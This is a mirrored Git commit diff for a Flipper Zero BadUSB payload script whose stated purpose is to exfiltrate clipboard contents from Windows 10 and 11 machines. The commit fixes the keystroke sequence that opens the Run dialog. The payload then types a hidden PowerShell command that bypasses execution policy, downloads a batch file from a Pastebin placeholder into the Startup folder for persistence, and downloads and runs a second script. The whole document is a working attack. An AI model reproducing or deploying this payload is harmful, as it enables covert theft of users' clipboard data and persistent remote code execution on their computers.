mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2025-01-05 05:10:13 +00:00
Update payload.txt
Fixed GUI and added standard DELAY.
This commit is contained in:
parent
9b52848fd5
commit
f313879031
@ -7,8 +7,8 @@ REM Description: This payload is meant to exfiltrate whatever is copied to t
|
|||||||
REM Target: Windows 10, 11
|
REM Target: Windows 10, 11
|
||||||
|
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
GUI
|
GUI r
|
||||||
DELAY
|
DELAY 200
|
||||||
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
|
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
|
||||||
ENTER
|
ENTER
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user